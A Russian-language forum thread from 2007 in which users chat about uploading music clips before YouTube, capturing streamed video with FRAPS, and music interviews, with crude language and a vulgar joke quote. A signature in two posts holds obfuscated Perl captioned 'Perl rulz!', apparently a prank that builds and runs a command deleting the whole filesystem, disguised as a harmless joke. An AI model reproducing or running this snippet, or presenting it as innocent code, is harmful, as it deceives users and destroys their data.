Добавлено: Ср Окт 31, 2007 2:48 am Заголовок сообщения:
Kenobi писал(а):
ю-тубу собрались обгонять по быстроте выкладывания...
мажорити и эмпти волс у нас появились раньше чем на ютубе
это как пример, из последнего _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Ну как спиздить, я тоже придумать не смог... Выходит спизить тока с помощью или камеры по ЖК (но качество все равно ужос будет) или скажем FRAPSом которая снимает с экрана... Но у меня каждые 15 секунд буферизация идет, так что хуйня... ПОтом конечно можно выезать, склеить итд, но заебаццо можно с этим всем... Итог, или забить на это хуй или занятся этим парню с самым быстрым инетом, у кого клипы грузятся сразу без подгрузок и заснять все это ФРАПСом.
Добавлено: Чт Ноя 01, 2007 2:14 am Заголовок сообщения:
xART писал(а):
у кого клипы грузятся сразу без подгрузок
у меня без _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
кто че думает на счет новостей? сегоднящнихх в смысле _________________ Скажи, что я ее люблю... Без нее вся жизнь равна нулю, из-за нее вся жизнь равна нулю... (с) А.Васильев
У тоб? так багато стор?н, я просто не розум?ю... Я просто хочу спитати тебе, чому ти наст?льки красива!?... (с) Олег Собчук
Цитаты дня:
xxx
Я много зарабатываю
xxx
Я работаю ртом
xxx
Я певица
yyy
а с личной жизнью все в порядке?
zzz
угу, еще как! Полный порядок. Мы никогда не ссоримся, не надоедаем друг другу и вообще во всем абсолютное согласие и единение
хотелось бы заценить все, кроме Эминема.
Особенно интересно заслушать Tool и KoЯn.
Интервью еще не смотрел... _________________ Love is not about the profits,
Nor the riches in your dreams....
А кто ещё? _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.